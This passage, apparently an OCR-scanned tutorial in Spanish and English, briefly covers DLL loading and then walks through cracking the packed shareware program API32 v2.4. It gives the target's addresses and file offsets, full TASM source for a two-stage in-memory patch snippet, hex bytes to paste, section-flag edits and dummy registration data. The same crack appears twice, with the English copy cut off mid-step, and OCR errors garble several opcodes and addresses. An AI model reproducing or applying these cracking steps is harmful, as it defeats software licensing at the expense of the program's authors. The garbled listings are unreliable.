El punto de entrada puede tener cualquier nombre y apunta a una función con tres parámetros: 
- hInstDll = manejador de instancia del módulo DLL. 


- reason = bandera con uno los siguientes valores: 

DLL_PROCESS_ATTACH: La DLL recibe este valor cuando injertado por vez primera en el espacio de 
direcciones del proceso. Se puede usar esta posibilidad para hacer inicialización. 
DLL_PROCESS_DETACH: La DLL recibe este valor cuando está siendo descargada del espacio de 
direcciones del proceso. Se puede usar esta posibilidad para hacer una limpieza como deslocalización de 
memoria. 

DLL_THREAD_ATTACH: La DLL recibe este valor cuando el proceso crea un uevo hilo. 
DLL_THREAD_DETACH : La DLL recibe este valor cuando un hilo del proceso es destruido 


Para que la DLL sea cargada dentro de un proceso, debe retornar TRUE en eax. En caso contrario, no 
será cargada. 


Las funciones de la DLL pueden ser colocadas antes o después de la entrada. Pero para que puedan ser 
llamadas desde otros programas, deben colocarse las siguientes líneas en el archivo DEF de definición: 


LIBRARY DLL_Name 
EXPORTS Function_Name 


La direcctiva LIBRARY define el nombre del módulo DLL. Debe señalarse con el nombre de archivo de 
la DLL. La directiva EXPORTS dice al enlazador (linker) cuales funciones de la DLL son exportadas, es 
decir, pueden ser llamadas desde otros programas. 


¿Cómo compilar y enlazar un archivo DLL? 
También hay que indicar en los conmutadores del enlazador la opción /DLL y /DEF:DEF_name: 
link /DLL /SUBSYSTEM:WINDOWS /DEF:DEF_name /LIBPATH:c:imasm32Vib OBJ_name.obj 
Los conmutadores del ensamblador son los mismos: 
/e /coff /Cp 
En el caso de Borland Turbo Assembler, en vez de /DLL, se coloca /Tpd: 
tlink32 /Tpd /aa /c /v S(OBJS),F(NAMB),, SIMPORT), S(DEP), (NAME) 


Después de enlazar el archivo objeto, se obtendrá la DLL y un archivo .lib. Este archivo .lib es la librería 
de importación que puede ser usada para enlazar programas que usan las funciones que está en la DLL. 


Para que un ejecutable EXE u otra DLL llame a funciones dentro de una DLL, debe proyectar primero la 
DLL en el espacio de direcciones del proceso que llama. 


¿Como cargar la DLL en el espacio de nombres del proceso ? 
Hay dos maneras: 


1. Enlazado implícito: es el más común. Como hemos visto al crear aplicaciones W32, al enlazar un 
ejecutable debemos indicar un conjunto de archivos LIB al enlazador. Estos archivos LIB contienen una 
lista de las funciones de la DLL que pueden ser importadas desde otros archivos EXE o DLL. Cuando 
hacemos el enlace, el enlazador toma información de los archivos LIB correspondientes y la incrusta en 
el archivo EXE creado. Luego, cuando el sistema cargue el EXE, el cargador examinará el encabezado de 
este archivo y establecerá las DLLs que deberán ser cargadas en el espacio de direcciones del proceso 
para que se ejecute la aplicación. El sistema buscará las DLLs requeridas en los directorios de sistema e 
intentará cargarlas. 


2. Enlazado explícito: llamando a LoadLibrary con el nombre de la DLL deseada. Si la función tiene 
éxito, devuelve un manejador a la librería (DLL). Si no, retornará NULL: 


invoke LoadLibrary,addr LibName 


El manejador devuelto se puede pasar a GetProcAddress o a cualquier otra librería que requiera este 
manejador como parámetro: 


mov hLib,eax 
invoke GetProcAddress,hLib,addr FunctionName 


Esta llamada devuelve la dirección de la función cuyo nombre ha sido pasado como segundo parámetro. 
De otra manera, retorna NULL. El valor devuelto ahora puede ser usado para llamar a la función deseada: 


mov TestHelloAddr,eax 
call [TestHelloAddr] 


Usada la librería DLL, se descarga con FreeLibrary: 


invoke FreeLibrary,hLib 2. 


El trabajo con Sinppet Creator tenía como finalidad fundamental consolidar nuestros conocimeintos sobre 
el encabezado de los archivos PE. Pero todavía nos quedan varios aspectos que todavía no hemos 
explotado como lo que llamo suma de chequeo (CRC) y la sección de recursos. Me he enterado que ya 
otros trabajan sobre esto, así que trataremos de adentrarnos en la sección de recursos .rsrc. 


Y tú, cabeza de recursos (en preparación) 
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Intro 


Ya he escrito un tutorial sobre Snippet Creator donde trato el tema de quebrar protecciones en 
archivos ejecutables PE enpacados. Me he dado cuenta que era un escrito muy duro para 
principiantes y he reorganizado un material que pudiera ser seguido mejor y con más facilidad. 


Sin embargo, para poder seguir este tutorial se requiere una experiencia mínima en lenguaje 
ensamblador orientado al sistema operativo Windows a 32 bits, conocimiento de las estrategias 
clásicas de desprotección de programas (las comunes), algunas nociones sobre la estructura de los 
archivos con formato PE. De alguna manera supongo también conocimietos sobre desempacado 
manual de archivos con ProcDump. 


El Camino 


El método clásico de crackear archivos PE empaquetados consiste en usar un parcheador de 
procesos (process patcher) y hacer el parche estratégico en tiempo de ejecución. Se trata de 
esperar hasta que el archivo sea desempacado en la memoria para su ejecución y entonces 
parcharlo. Para hacer esto, tenemos que tener el manejador del proceso. 


Tenemos entonces que un parchador de un proceso se puede dividir en dos partes: 
un cargador: una rutina que carga el proceso objeto generalmente en modo de depuración. 


un parchador: una rutina que intercepta el proceso, toma el control y escribe el parche en el 
proceso. 


Yo nunca he usado este método. Uso otro, también clásico: injertar un recorte de código que 
tome el control del programa cuando éste se ejecuta, sobre-escriba el archivo objeto en tiempo de 
ejecución y haga los parches necesarios en puntos estratégicos. Estos puntos estratégicos son 
direcciones virtuales del proceso o desplazamientos dentro del archivo: 


1. Final de la rutina que desempaca el archivo : Desplazamiento 1 - VA1 (Virtual Address 1) 

Todo archivo ejecutable necesita ser desempacado para correr. El código con que comienza el 
programa que contiene este archivo es un "cargador" [ loader | que desempaca el archivo en 
memoria. Cuando la rutina termina, el archivo objeto es desempacado en memoria, y podemos 
parcharlo en este momento. Una vez alcanzado el final del "cargador" del archivo empacado, el 
archivo ya debería estar desempacado en la memoria, así que a partir de la dirección de las 
últimas instrucciones del cargador escribimos unas nuevas instrucciones que hacen que el 
programa pase el control a un recorte de código que hemos insertado estratégicamente dentro del 
archivo empacado. Este recorte parchará entonces el archivo de manera que quedan rotas las 
protecciones que impiden su disfrute. A la dirección dónde termina de ejecutarse el cargador del 
empacado la llamamos VA1. 


2. Un lugar para el recorte. Desplazamiento 1 - VA2 (Virtual Address 2) 

Tenemos que especificar dónde colocaremos el recorte de código parchador que romperá la 
protección del programa. Este código ha de recibir el control desde el cargador que desempaca el 
programa cuando éste es ejecutado. Cuando el recorte se ejecuta, re-escribe algunas instrucciones 
que eliminan las protecciones y restaura las instrucciones que le entregaron el control para que el 
programa siga su curso y devuelve el control al programa. Para hacer el parche, la sección del 
archivo PE a parchar debe ser "escribible" (writeable), de lo contrario se producirá un error de 
protección. A la dirección donde colacamos el recorte la llamamos VA2. 


3. La dirección de la instrucción a parchar: VA3 (Virtual Address 3) 
Todavía tenemos que romper la protección del archivo. Esto no lo podemos hacer a la manera 


clásica, directamente sobre los desplazamientos característicos con un editor hexadecimal porque 
el archivo objeto está empaquetado. Podemos localizar las instrucciones a parchar y sus 
direcciones con un depurador (debugger) como Softlce y luego proceder a parchar el archivo con 
código que podemos introducir en un punto estratégico del ejecutable empaquetado. El problema 
es que generalmente los empacadores al empacar un archivo ejecutable PE, cambia las 
características de sus secciones, evitando que Softlce, y otros desensambladores, se detengan en 
ciertos del programa. Para que Softlce pueda revisar un programa de estos, debemos revisar las 
características de las secciones del archivo ejecutable para asegurarnos que las secciones de 
código tengan las características típicas que les convienen. 


4. Escribir y ensamblar el recorte. 

Si tenemos éxito en el intento de romper la protección que nos mortifica, debemos proceder a 
escribir un recorte de código enensanblador (es lo más pequeño y rápido), ensamblarlo y pegarlo 
en el archivo objeto donde hemos establecido. 


¿Eselcamino? 


A veces encontramos que las instrucciones finales del cargador del archivo empaquetado también 
están empacadas. Así que tenemos que esperar que estas últimas instrucciones sean 
desempacadas antes de parcharlas para que entreguen el código al recorte. Para resolver esto, 
podemos pasar el control a nuestro recorte parchador antes de que la rutina cargadora llegue al 
final. ¿Cuándo? cuando las instrucciones finales del cargador hayan sido desempacadas. 
Entonces tenemos que agregar algunas instrucciones adicionales al recorte para que éste parche 
primero las últimas instrucciones del cargador y éste pueda entregar de nuevo, por segunda vez, 
el control al recorte. La segunda vez que el recorte tiene el control, parchará el código original 
del programa y eliminará sus protecciones. 


5. Dirección de la primera llamada al recorte: VAO. 

Bien, el recorte recibirá entonces el control dos veces. La primera vez, parchará las últimas 
instrucciones de la sección del archivo encargada de desempacar el programa; este parche 
consiste en un par de instrucciones que entregarán el control al recorte por segunda vez. En esta 
última ocasión, el recorte ejecutará una nueva rutina que parchará el programa en memoria y lo 
desprotegerá. A la dirección que entrega el control por primera vez al recorte lo llamamos VAO. 


<<On the way>>(Do you remember Jack Kerouack?) 


Crackear un archivo empacado empleando este método es sencillo con Snippet Creator, una 
herramienta hecha para injertar código nuevo en archivos ejecutables con formato PE. Así que 


consigamos este programa, corrámoslo y creemos un proyecto nuevo: FilelNew project. Este 
comando desplegará una ventana donde podrás seleccionar el archivo que deseas cambiar o 
desproteger y dar un nombre al proyecto. Cuando creas un programa, Snippet Creator crea un 
subdirectorio con el nombre que tú eliges y un archivo .INI que salva la información y permite 
reabrir el proyecto. 


1. Final de la rutina desempacadora: Desplazamiento 1 - VA1 (Virtual Address 1) 


Nuestro objetivo será ap132 v2.4. Para registrar este programa y obtener todas sus funciones 
podemos buscar y calcular su serial. Pero he visto que esto puede resultar un trabajo largo y 
arduo. Á veces es preferible (menos trabajo - mejor resultado, +ORC) parchar el archivo 
ejecutable cuando se pueda. Tomaremos este camino. 


Primero tenemos que ubicar el final de la rutina que desempaca el archivo. Cargamos el 
programa con Softlce y bajamos de alguna manera (usando la tecla F10, y ocasionalmente F5 y 
F9 para evitar los bicles [ loops ] ) hasta 00 41 B5 D2. 


Esta instrucción es un salto [ jump ] al punto de entrada original del programa en la sección .text: 


:0041B5BD 8B 64 24 14 mov esp, dword ptr [esp+14] 
:0041B5C1 SE pop esi 

:0041B5C2 8B FE mov edi, esi 

:0041B5C4  81C6D7150000 add esi, 000015D7h 
:0041B5CA  6A 05 push 00000005h 

:0041B5CC. 59 pop ecx 

:0041B5CD — F3 repz 

:0041B5CE — A4 movsb 

:0041B5CF 61 popad 

:0041B5DO  669D popf 


:0041B5D2 E9E09 9F FE FF jmp 004055C0h ; <- Salto al punto de entrada original 


La instrucción en la dirección 00 41 B5 D2 es donde termina el cargador interno del programa 
empaquetado. Llamamos a esta dirección VA1. 


En esta dirección tendremos que escribir una instrucción de seis bytes que tiene la forma: 


l: push address_of_snippet 
A 


Estas instructiones entregarán el control al recorte. Un código con esta forma tiene un tamaño de 
seis bytes. En octal: 


l: 68 zz yy xx 00 
2 - “ES 


El código octal 68h es la instrucción empujar a la pila [ push ] un dato dword. El resto de la 
instrucción es un número hexadecimal de 32 bits que será empujado a la pila: 00 xx yy zz h; este 
número es la dirección a la que saltará el programa con la siguiente instrucción. Así que la 
instrucción 1 será en ensamblador: 


push 00 xx yy zz h 


El código octal C3h corresponde a la instrucción en ensamblador 'RET". Esta instrucción hace 
que el programa salte a la dirección a la que apunte el registro SP o ESP (el puntero de pila). En 
este caso es la dirección 00 xx yy zz h en la memoria virtual del proceso y que antes metimos en 
la pila. 


Pero todavía hay un problema. La instrucción original en VA1 también está empacada; entonces 
tenemos que esperar hasta que esta instrucción sea cargada para escribir un primer salto [ jump ] 
al recorte: tendremos que localizar otra dirección VAO anterior a VA1 que entregue una primera 
vez el control al recorte: en esta primera ocación, el recorte sobre-escribirá la instrucción en la 
dirección VA1 para que en VA 1 el programa entregue nuevamente el control al recorte. La 
segunda vez que el recorte recibe el control, parchará el programa y lo desprotegerá. Por último 
restaurará las instrucciones originales que reescribió antes. 


Una buena dirección para dar el control al recorte por vez primera es: 
:0041A110  0F84A7 1400 00 je 0041B5BDh 
Llamamos a esta instrucción VAO. ¿Cómo conseguirla? 


Cargo el programa con el loader de SoftIce. Cuando se despliega la ventana de Softlce, ejecuto el 
comando "D 41B3D2". Luego voy trazando las diversas instrucciones del programa con la tecla 
F10 hasta ver como se realiza un cambio en la dirección 41B5D2 en la ventana de datos. Seguro 
aparecerá algo como " FE9FE9 E9  FFFEB5 BB", que son los valors octales de las 
instrucciones siguientes, pero invertidas: 


:0041B5D2  E9E09 9F FE FF jmp 004055C0h ; <- Jump to the original entry point 
:0041B5D7 E9BB B5 FE FF jmp 00406B97h 


Entonces, cuando el programa llega a 00 41 Al 10 h, las instrucciones en la dirección 00 41 B5 
D2 h estarán desempacadas y podrán ser parchadas. 


2. Un lugar para el recorte. Desplazamiento 1 - VA2 (Virtual Address 2) 


Para ubicar un lugar para el recorte podemos emplear un método bastante empírico pero que 
funciona. Abrimos el programa con un editor hexadecimal como HexWorkshop y buscamos un 
sitio sin código, lleno de ceros. Estos espacios amplios genertalmente podemos encontrarlo al 
final de las diversas secciones. Así que podemos encontrar un espacio amplio al final de la 
sección .rsrc, en el desplazamiento 00 D3 20 h. 


Podemos elegir este espacio. Tenemos el desplazamiento dentro del archivo, pero necesitamos su 
dirección virtual. Esta dirección la podemos calcular con esta fórmula: 


(Desplazamiento del recorte - Desplazamiento del inicio de la sección) + VA de la Sección 
A esta dirección la llamamos VA2. 


Ya hemos determinado la sección donde pondremos el recorte .rsrc. Para hacerlo ejecutamos en 
Snippet Creator PE InfoWView Section Info. Podemos ver que este desplazamiento está en la 
sección .rsrc, antes de la sección "madmat". El desplazamiento de inicio de la sección [ Raw 
Offset of the section ] es 4A 00h. 


La dirección virtual de la sección [ VA of Section ] es: Dirección de la base de la imagen [ Image 
Base Address | + Desplazamiento virtual de la sección [ VA offset of the section ]: 


00 40 00 00h +00 01 00 00 h = 00 41 00 00 h 
Ahora calculamos: 
VA2 = (00 D3 20h - 00 4A 00h) + 00 41 00 00h = 00 41 99 20h 


Esta es la dirección VA2. 


3. La dirección a parchar: VA3 (Virtual Address 3) 


Ahora vamos a desproteger el programa. Por razones de brevedad, considerando que el lector de 
este tutorial no es propiamente un principiante, no detallaré el proceso para ubicar el punto a 
parchar. Simplemente lo diré. Para que el programa corra como si estuviera registrado, con todas 


sus funciones, debemos cambiar en el siguiente código: 


:00404815 03EA add ebp, edx 
:00404817 41 inc ecx 
:00404818 4E dec esi 
:00404819 T5DA jne 004047F5 
:0040481B 33C0 xXor eax, eax 
:0040481D SF pop edi 
:0040481E 85ED test ebp, ebp 
:00404820 SE pop esi 
:00404821 5D pop ebp 
:00404822 0F94C0 sete al 
:00404825 SB pop ebx 
:00404826 59 pop ecx 
:00404827 C3 ret 


La instrucción: 
:00404822 0F94C0 sete al 


Es donde el programa coloca una bandera en el registro al para indicar si el programa está 
registrado o no. Si esta instrucción pone 1 en al, el programa está registrado. Entonces podemos 
cambiar esa instrucción de tres bytes por 


:00404822 FECO inc eax 
:00404824 90 nop 


Esta instrucción hará a al diferente de cero. Cuando el programa revise la bandera, actuará como 
si el programa hubiera sido registrado y actuará como tal. 


Aunque esto sería suficiente para registrar el programa, todavía necesitamos introducir nuestro 
nombre de ususario y el serial. El programa revisa el número de caracteres en el nombre de 
usuario (debe ser mayor que cinco) y el de la clave (debe ser 16 o más). 


Bien. ya tenemos la dirección de los parches. 


4. Escribir y ensamblar el recorte. 


Tenemos que crear el proyecto en Snippset Creator: FilelNew project. Lo llamamos api32. 


Luego configuramos las opciones del proyecto: 


Snippet VA = VA2=41 99 20 

Patch Options = Patch into Existing Section 

Address to Redirect Control To the Snippet = Redirect Control From Code Section 
VA1 =00 40 17 75 

Return Control to the program = Don't Return Control To Program 


Estas opciones eligen: 


- la dirección virtual donde el recorte será injertado (VA2) 

- el recorte será injertado dentro de una sección existente (.rsrc) 

- la dirección virtual donde el programa dará el control al recorte (VA 1) 

- el recorte no regresará el control al programa; tenemos que hacerlo nosotros y escribirlo en el 
recorte. 

- Snippet Creator no restaurará las instrucciones originales del programa. Tenemos que hacerlo 
nosotros. 


Luego escribimos el recorte y lo ensamblamos. A continuación está el código del recorte para 
TASM v5.0. Antes de ensamblar el recorte debemos elegir y configurar el ensamblado que 
usemos. Ejecutamos en Snippet Creator ActionvOptions para desplegar la ventana "General 
Options". Escogemos el ensamblador (TASM o MASM según sea el caso) y establecemos los 
comandos y parámetros correspondientes. En mi caso particular, que he empleado TASM v5.0, y 
tengo a Snippet Creator en el directorio CAASMNCZA, los valores y comandos son: 


Assembler 

TASM 

Locations 

Assembler: TASM32 /ml %1 

Linker: TLINK32 /Tpe /c /aa /V4.0 %1,,CATAILIB úmport32.lib 


Project Directory: CiASMUCZA 


Estos comandos suponen que el directorio donde tengo TASM32.EXE y TLINK32.EXE, está en 
entorno; es decir, cuando inicio la sección en Windows, el archivo por lotes "autoexec.bat" tenía 
la siguiente línea: 


PATH  CATASMIBIN;¡CATASMLIB;¡CATASMUNCLUDE;%PATH% 


A contiuación el código del recorte: 


jmp init 


oldinstl db 00Fh,084h,0A7h,014h,000h,000h 
oldinst2 db 0E9h,0E9h,09Fh,OFEh,OFFh,09Eh 
newinstl db 068h, 020h,099h,041h,000h, 0C3h 
newinst2 db OFEh,0COh,090h 

counter db O 


init: 

pushad 

cmp counter,0 
jne time2 


; Restaurar la instrucción 1 
inc counter 


mov edi,41A110h ; dirección de la instrucción original 1 en VAO 
lea esi,oldinstl ; instrucción a restaurar 

mov ecx,6 push ecx ; tamaño de la instrucción original 

rep movsb ; restaurar la dirección original 


; Escribir la nueva instrucción en VA1: segundo salto al recorte 

mov edi,41B5D2h ; dirección donde se volverá a entregar el control al recorte: VA1 
lea esi,newinstl ; instrucción a escribir 

pop ecx ; tamaño de las instrucciones 

rep movsb 


; Retorno 1 
popad 

push 41A110h 
ret 


time2: 

; Restauar intrucción 2 

mov edi,41B5D2h ; dirección de la instrucción original 2 en: VA1 
lea esi,oldinst2 ; Instrucción a restaurar 

mov ecx,6 

rep movsb 


; Write new instruction 2: patch 2 
mov edi,404822h ; dirección de la instrucción original 2 en : VA2 


lea esi,newinst2 ; instrucción a escribir 
mov ecx,3 ; tamaño de las instrucciones 
rep movsb ; escribirlas 


; Retorno 2 
popad 

push 41B5D2h 
ret 


Después de escribir estas lineas en la ventana de edición de Snippet Creator, presionamos el 
botón "Assemble" y esperamos. Si no hay error, el recorte de código ha sido ensamblado y 
enlazado. 


Ahora podemos "exportar" el binario correspondiente al recorte (FilelExport) y salvamos 
api32.bin. 


Abrimos el archivo api32.exe con HexWorkshop (conviene más emplear este editor que HIEW, 
ya que necesitamos tener dos vistas desplegadas al mismo tiempo, una del archivo api32.exe y 
otra del recorte api32.bin). Vamos al desplazamiento 00D320 h ( Edit/Goto ). Es el 
desplazamiento donde colocaremos el recorte de código. 


Ahora abrinos el archivo api32.bin que hemos exportado. Lo marcamos totalmente con el ratón y 
lo copiamos (CTRL+C). Luego desplegamos la vista de api32.exe y vamos al desplazamiento 
00D320h y marcamos desde 00D320 hasta V0OD39Eh. Ahora pegamos el recorte (CTRL+V). Para 
terminar, ponemos en el desplazamiento 00D510h (correspondiente a la dirección virtual VAO) la 
instrucción que entrega el control al recorte por primera vez: 68 20 99 41 00 C3. Esto significa: 


:0041A110 68 20 99 41 00 push 00419920 
:0041A115 C3 ret 


Recordar que el recorte ha sido colocado en la sección .rsrc. Como sobrescribimos esta sección 
con alguna instrucción debemos asegurarnos que soporte escritura. Revisemos las características 
de la sección .rsrc: PE InfoWView Section Info. Las características son: 40 00 00 40 h. Esto 
significa: 


Datos Inicializados: 00 00 00 40 h 
Lectura: 40 00 00 00 h 
40 00 00 40h 


La sección no soporta escritura, así que tendremos que editar las características. Para hacer esto 
hacemos click con el botón derecho del ratón sobre la cadena .rsrc que aparece en el cuadro de 
diálogo "Section Information". Seleccionamos "Edit Section" en el menú emergente: esto 
despliega el vuadro de diálogo "Modify Section Values". Pulsamos el botón "...” al lado del 
campo "Characteristics". Esto despliega el cuadro de diálogo "Section Charactheristics". 
Seleccionamos la caja de chequeo IMAGE_SCN_MEM_WRITE y salvamos ( save ). Ahora las 
características de la sección serán: CO 00 00 40 h: 


Datos Inicializados: 00 00 00 40 h 


Lectura: 40 00 00 00 h 
Escribible: 80 00 00 00h 
CO 00 00 40 h 


Esto mismo lo tenemos que hacer para todas aquellas secciones que serán escritas durante el 
proceso, como el cargador del empacado, que es la sección con que inicia un ejecutable 
empaquetaso. Eso es todo. 


Registrando 


Ahora corremos el programa y pulsamos el botón 'register'. Escribimos un nombre con más de 
cinco caracteres: 


Mi_Nombre 


y un código serial con más de dieciseis caracteres: 


FREE-FREE-FREE-FREE 


Hacemos click sobre OK, y listo... 


Comentarios y correcciones: nuMIT_orOiname.com 


Mi página de programación: nuMIT_ors Programming Page 


CRACKING PACKED FILES (|) 


by nuMIlT_or [kUT] 


Target: API32 v.2.4 
Tools: —Snippet Creator 
HexWorkShop 
Softlce 
MASM v6.0 or TASM v5.0 
Note: You can find this tools in : http://members.xoom.com/crk10/archivos 


Author: nuMIT_or 


Intro 


I've already written a papper about Snippet Creator. But I've have thought that this first papper is 
a very hard piece to the newbyes. I wait that this article could be easyer to understand. 


I suposse that you know the PE header files structure and you have knowledge about assembly 
language programming for windows 95/98 applications. 


I apologize for my english. 


The Way 


The clasic method to crack packed files is to use too a process patcher and do the strategic patchs 
in run time. The question is wait until the file is unpacked in memory and then to patch it. To 
make this, we have to obtain the process handle. So, the process patcher divides in two parts: 


a loader: a routine that load the process target generally in debug mode. 


a patcher: a routine that intercepts the process and take the control or patch the process. 


I've not used this method. I use other method, too clasic: to injert a snippet of code that 
overwrittes the target and patch it in strategic points. This strategic points are virtual address of 
the process or offset into the executable file: 


1. The end of the loader rutine: Offset 1 - VA1 (Virtual Address 1) 

All packed executable file needs to be unpacked to run. The initial code of this files is a loader 

that unpcacks the file in memory. When this routine ends, the target file is unpacked in 
memory, and we can patch it. In this point, we have to pass the control to a code snippet that 
will patch 

the file. 


2. A place for the snippet. Offset 1 - VA2 (Virtual Address 2) 

In this address, we have to place the code snippet that will patch the target. This code will 
receive 

the control from the loader that unpacks the file, when the file is unpacked in memory to run. 

When the patch is doen, the code snippet will restaurate the changed instructions and will 
return 

the control to the target program. To do the patch, the file section to patch must to be 
writteable. 


3. The address to patch: VA3 (Virtual Address 3) 

Still we have to crack the file. We can not do this directly with a hexadecimal editor (the 
clasic) 

because the target file is packed. We can localize the instructions to patch and their address 
with 

a debugger like Softlce and then proceed to patch it with the code snippet. To load the program 

with Softlce, we must revise the characteristics of the executable file sections to sure us that 
the 

code sections have the code characteristics. 


4. Write and assembly the snippet. 
If we have succes with the crack, we must to write the code snippet, assembly it and paste it in 
the target where we have established it. 


Is not the way? 


Sometimes we can find that the final instruction of the packed file loader is packed. Thus, we 
have to wait that these last instructions are unpacked before to patch 1t. We must to pass the 
control to the code snippet before the loader come to the end. When? when the final instructions 
of the loader have been unpacked. Then, we have to add some instructions at the snippet to path 


the last instructions of the loader to give again the control to the code snippet. The second time 
that the snippet has the control, will patch the original code of the program and will crack it. 


5. The addres for the first call to the snippet. 

Well. The snippet will receive the control two times. The first time, will patch the last 
instructions 

of the packed file loader to get again the control and crack the program in memory. 


<<On the road>>(Do you remember Jack Kerouack?) 


We will see that to crack a packed program, with the method that I've exposed, is easiest with 
Snippet Creator. So that run this program and create a proyect: FilelNew project. This command 
wille display a window where you can select your target and give a name to the project. When 
you create a program, Snippet Creator create a subdirectory with the name that you chose and a 
.INI file that save the info to reopen the project.. 


1. The end of the loader rutine: Offset 1 - VA1 (Virtual Address 1) 


Our target will be ap132. To register this program and to get all his functions we can search and 
calculate its serial key. But I've seen that this can be a long work. Sometimes I prefer to patch the 
target. We will take this way. 


The file api32.exe, the main executable of our target application, is packed. Before revise it with 
Softlce we have to change the chractheristics of the code sections. If we have run Snippet 
Creator, we do FilelNew project and select api32.exe. We'll give to this project the name 
"api32". Now we execute PE InfoWView Section Info. This will display the Section Information 
window. 


We can to take advantage of this moment and revise other aspects of our target. We execute PE 
InfoWView PE Header and we take notes of the PE Header Information window: 


Image Base Address: 40 00 00 h 
Address of Entry Point: 01 AO 00 h 
Base if Code: 00 10 00 h 


Now we load the program witch Softlce. 


Well, now you have to get down until VA1 (Virtual Address1 = End of the loader routine): 


00 41 B3 D2 


This instruction is a jump to the original program entry point in the .text section: 


:0041B5BD 8B 64 24 14 mov esp, dword ptr [esp+14] 
:0041B5C1 SE pop esi 

:0041B5C2 8B FE mov edi, esi 

:0041B5C4  81C6D7150000 add esi, 000015D7h 
:0041B5CA  6A 05 push 00000005h 

:0041B5CC. 59 pop ecx 

:0041B5CD F3 repz 

:0041B5CE — A4 movsb 

:0041B5CF 61 popad 

:0041B53DO  669D popf 


:0041B5D2 E9E09 9F FE FF jmp 004055C0h ; <- Jump to the original entry point 
:0041B5D7 E9BB B5 FE FF jmp 00406B97h 


In this address we have to write a code of six bytes size that has the form: 


push address_of_snippet 
ret 


These instructions will give the control to the snippet. A code with this form has a size of six 
bytes. In hexadecimal: 


1: 68 zz yy xx 00 
Zo ES 


The 68h octal code number is a push dword data. The rest of the instruction is the 32 bits 
hexadecimal number to push in the stack: 00 xx yy zz. So the instruction 1 will be: 


push 00 xx yy zz h 


The octal code C3h means the 'RET' instruction. This code is a jump to the address in the pointer 
stack register (esp). In this case is the 00 xx yy zz address in the virtual memory of the process. 


But still there is a problem. The original instruction in VA 1 is too packed; then we have to wait 
until this instruction is loaded to write the jump to the snippet here. So that we have to alloc 
another addres that will give the control once to the snippet. The snippet itself will overwrite the 
instruction in VA1 for that in VA1 the program gives newly the control to the snippet. In the 
second time, the snippet wiill patch the original program andwill crack it. 


A good address to give the control to the snippet the first time, is VAO: 


:0041A110  0F84A7 1400 00 je 0041B5BDh 


when the program comes at this point, the instructions in 


:0041B5D2  E9E09 9F FE FF jmp 004055C0h ; <- Jump to the original entry point 
:0041B5D7 E9BB B5 FE FF jmp 00406B97h 


have been unpacked and can be patched. 


The address 00 xx zz h, is the virtual addres where is the parcher snippet. We name to this virtual 
address VA2. 


2. A place for the snippet. Offset 1 - VA2 (Virtual Address 2) 


To alloc the VA2 addres we proceed in this way. 


We open the program with the hexadecimal editor. Search a place with space, e.g.: 


offset 0D320h 


We can look at this point a great space filled with Os. 


Now we calculate the virtual address: 


(Offset of the snippet - Raw Offset of the section) + VA of the Section 


So that we have to determine the section where is the offset of the snippet. We execute PE 
InfoWView Section Info. We can look that this offset is in the .rsrc section, before the madmat 
section. The "Raw Offset of the section" is 4A 00h. 


The VA of Section is the Image Base Address + VA offset of the section: 


00 40 00 00h + 00 01 00 00 h = 00 41 00 00 h 


Now we calculate: 


VA2 = (00 D3 20h - 00 4A 00h) + 00 41 00 00h = 00 41 99 20h 


This is the VA2. 


3. The address to patch: VA3 (Virtual Address 3) 


Now we have to crack the program. 


The NAG says "UNREGISTERED". This string has to change 1f the program comes to 
registered. So, when begins to run, the program revises 1f 1t has been registered. So that we do 
Ctrl+D to display Softlce and BPX DialogBoxParamA to stop the program when call this dialog. 
ES. 


Run the program and Softlce will popup. F11 and you will be here: 


:0040103E 6A00 push 00000000 
:00401040 6800114000 push 00401100 ; Address of Dialog Procedure 
:00401045 6A00 push 00000000 


* Possible StringData Ref from Data Obj ->"apis32x_LOAD_DLG" 


:00401047 68C4924000 push 004092C4 
:0040104C 56 push esi 
:0040104D A30CD04000 mov dword ptr [0040D00C], eax 


* Reference To: USER32.DialogBoxParamA, Ord:008Eh 


:00401052 FF15A4034100 Call dword ptr [004103A4] 
:00401058 85C0 test eax, eax 
:0040105A 0F8482000000 je 004010E2 


Is the routine that display de first NAG. 


Close the program. 


Now BPX 00401100. This is the address of the procedure of this Dialog Box. The Dialog Box 
Procedure is a set of routines that process all the events that the user causes over the dialog box, 
for example, click with a button of the mouse. Run the program and you will be in a moment 
here: 


:00401100  8B442408 mov eax, dword ptr [esp+08] 

:00401104 56 push esi 

:00401105  3D10010000 emp eax, 00000110 

:0040110A 0F878F000000 ja 0040119F ; jump if the msg is 0111h (WM_COMMAND) 
:00401110  743A je 0040114C 

:00401112  83E810 sub eax, 00000010 

:00401115 7409 je 00401120 

:00401117  83E802 sub eax, 00000002 

:0040111A.— 0F858D000000  jne 004011AD 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
[:0040110A(C) | 
:0040119F  3D11010000 
:004011A4  743F 


cmp eax, 00000111 ; WM_COMMAND 
je 004011ES ; jump if the msg is 0111h (WM_COMMAND) 


The following routine processes the WM_COMMAND message: 


:004011E5 8B4C2414 mov ecx, dword ptr [esp+14] 
:004011E9 8B542410 mov edx, dword ptr [esp+10] 
:004011ED 8B442408 mov eax, dword ptr [esp+08] 
:004011F1 51 push ecx :004011F2 52 push edx 
:004011F3 S0 push eax 

:004011F4 EsSD7000000 - call 004012D0 

:004011F9 83C40C add esp, 0000000C 


When the procedure processes the WM_COMMAND message, it revises if the program has been 
registered. Now Fl10 until here: 


:00404815 03EA add ebp, edx 
:00404817 41 inc ecx 
:00404818 4E dec esi 
:00404819 T5DA jne 004047F5 
:0040481B 33C0 xXor eax, eax 
:0040481D SE pop edi 
:0040481E 85ED test ebp, ebp 
:00404820 SE pop esi 
:00404821 SD pop ebp 
:00404822 0F94C0 sete al 


:00404825 SB pop ebx 
:00404826 17 pop ecx 
:00404827 C3 ret 


This is the routine that revise the serial key when the program begin. Well, if you change: 


:00404822 0F94CO0 sete al 


By: 


:00404822 FECO inc eax 
:00404824 90 nop 


The program will be registered. The value in the AL register is a register flag here. If AL > 0, 
then the program is registered. 


Only a thing. The program revises the number of characters in the name (must to be 5 or more) 
and the number of characthers in the serial code (must be 16 or more). 


Well, we have the address of the patchs. 


4. Write and assembly the snippet. 


We have to create a project with Snippset Creator: api32. Now we have to configure the program 
options. We execute the command Action Project Options and select the following values: 


Snippet VA = VA2 = 41 99 20 

Patch Options = Patch into Existing Section 

Address to Redirect Control To the Snippet = Redirect Control From Code Section 
VA1 =00 40 17 75 

Return Control to the program = Don't Return Control To Program 


This options select 


- the virtual addres where the snippet will be injected (VA2) 

- the snippet will be injected into a existing section (.rsrc) 

- the virtual address where the program will give the control to the snippet (VA 1) 
- the code snippet will not return the control to the program. We'll have to do it. 


